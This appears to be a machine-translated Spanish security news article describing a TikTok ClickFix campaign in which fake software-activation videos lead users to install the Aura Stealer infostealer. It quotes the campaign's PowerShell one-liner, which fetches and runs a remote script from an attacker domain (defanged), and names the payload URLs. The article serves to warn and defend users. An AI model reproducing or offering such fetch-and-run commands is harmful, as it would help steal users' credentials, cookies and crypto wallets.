Los ciberdelincuentes distribuyen malware para robar información en TikTok mediante vídeos disfrazados de guías de activación de software gratuito. De acuerdo a pitidocomputadoraXavier Mertens, responsable de ISC, identificó la campaña en curso, que emplea un método de ingeniería social conocido como ataque ClickFix para infectar sistemas informáticos. Los vídeos, observados por pitidocomputadoraafirman proporcionar instrucciones para activar software legítimo como Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro y Discord Nitro. La campaña también promueve servicios ficticios, incluidos «Netflix Premium» y «Spotify Premium». Mertens señaló que esta actividad es en gran medida la misma que una campaña observada anteriormente por la firma de seguridad Trend Micro en mayo. Los videos utilizan una técnica de ingeniería social que presenta una solución o un conjunto de instrucciones aparentemente válido para engañar a los usuarios y obligarlos a comprometer sus propias máquinas. Este ataque ClickFix engaña a los usuarios para que ejecuten comandos maliciosos de PowerShell. Cada vídeo muestra un comando de una línea, como `iex (irm slmgr[.]win/photoshop)`, e indica a los espectadores que lo ejecuten con privilegios de administrador. El nombre del programa en la URL se modifica para que coincida con el software que se está suplantando; una guía falsa de Windows usaría una URL que contuviera «windows» en lugar de «photoshop». Cuando se ejecuta el comando, PowerShell se conecta al sitio remoto `slmgr[.]win` para recuperar y ejecutar otro script de PowerShell. Este script descarga dos ejecutables de las páginas de Cloudflare. El primero, de `https://file-epq[.]paginas[.]dev/updater.exe`, es una variante del malware Aura Stealer. Este ladrón de información está diseñado para recopilar credenciales guardadas del navegador, cookies de autenticación, datos de billeteras de criptomonedas y otras credenciales de aplicaciones. Luego, los datos robados se cargan a los atacantes, lo que les otorga acceso a las cuentas de la víctima. También se descarga una segunda carga útil, `source.exe`, como parte del ataque. Según Mertens, este ejecutable autocompila el código utilizando el compilador Visual C# integrado de .NET (`csc.exe`). Posteriormente, el código resultante se inyecta y lanza directamente en la memoria. El propósito específico de esta carga útil adicional aún no está claro. Los usuarios que hayan realizado estos pasos deben considerar todas sus credenciales comprometidas. El curso de acción recomendado es restablecer inmediatamente las contraseñas en todos los sitios y servicios que utilizan para evitar el acceso no autorizado a la cuenta y un mayor robo de datos. Los ataques ClickFix se han vuelto populares durante el último año y se utilizan para distribuir varias cepas de malware en campañas de ransomware y robo de criptomonedas. Como regla general, los usuarios nunca deben copiar texto de un sitio web y ejecutarlo en un cuadro de diálogo del sistema operativo. Este aviso incluye la barra de direcciones del Explorador de archivos, el símbolo del sistema, los mensajes de PowerShell, el terminal macOS y los shells de Linux.
